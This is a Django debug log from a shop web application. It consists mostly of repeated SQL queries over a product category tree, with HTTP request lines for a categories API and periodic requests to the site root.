"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:38:22,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:38:22,631 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:38:22,634 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:38:22,637 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:38:22,641 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:38:22,644 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:38:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:38:34,009 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:38:34,015 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 02:38:34,019 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:38:34,022 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:38:34,024 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:38:34,027 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 02:38:34] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-20 02:38:34,030 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:38:34,032 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:38:34,035 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:38:34,037 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:34,039 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:38:34,042 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:38:34,044 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:34,047 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:38:34,049 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:38:34,051 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:38:34,054 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:38:34,056 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:38:34,059 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:38:34,061 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:38:34,063 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:34,067 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:38:34,069 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:38:34,072 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:38:34,074 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:38:34,076 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:38:34,078 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:38:34,082 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:38:34,084 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:38:34,086 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:38:34,089 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:38:34,091 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:38:34,094 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:38:34,096 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:38:34,098 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:38:34,101 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:38:34,103 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:38:34,106 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:38:34,108 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:38:34,111 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:38:34,113 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:38:34,115 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:38:34,117 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:38:34,120 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:38:34,122 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:38:34,124 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:38:34,127 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:38:34,130 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:38:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 02:40:39] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:45:42] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:50:44] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:55:47] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:57:27] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:05:02] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:17:59] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:25:43] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:30:46] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:35:48] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:40:51] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:45:53] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [20/Dec/2019 03:50:51] "GET /favicon.ico HTTP/1.0" 404 6454 [20/Dec/2019 03:50:56] "GET / HTTP/1.0" 302 0 [20/Dec/2019 03:55:59] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:04:56] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:21:06] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:26:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:33:34] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [20/Dec/2019 04:36:01] "GET /robots.txt HTTP/1.0" 404 6451 [20/Dec/2019 04:36:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 04:36:02,174 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '20lm6wm1ojrbeiafanm93jv1mtwiql7k' LIMIT 1; args=('20lm6wm1ojrbeiafanm93jv1mtwiql7k',) DEBUG 2019-12-20 04:36:02,175 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('20lm6wm1ojrbeiafanm93jv1mtwiql7k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T04:36:02.174484+00:00'::timestamptz); args=('20lm6wm1ojrbeiafanm93jv1mtwiql7k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 4, 36, 2, 174484, tzinfo=)) [20/Dec/2019 04:36:02] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 04:38:36] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:43:39] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:48:42] "GET / HTTP/1.0" 302 0 [20/Dec/2019 04:55:57] "GET / HTTP/1.0" 302 0 [20/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 05:11:53] "GET / HTTP/1.0" 302 0 [20/Dec/2019 05:16:55] "GET / HTTP/1.0" 302 0 [20/Dec/2019 05:22:50] "GET / HTTP/1.0" 302 0 [20/Dec/2019 05:27:53] "GET / HTTP/1.0" 302 0 [20/Dec/2019 05:32:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 05:33:20,710 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:33:20,722 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:33:20,729 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:33:20,733 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:33:20,740 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) 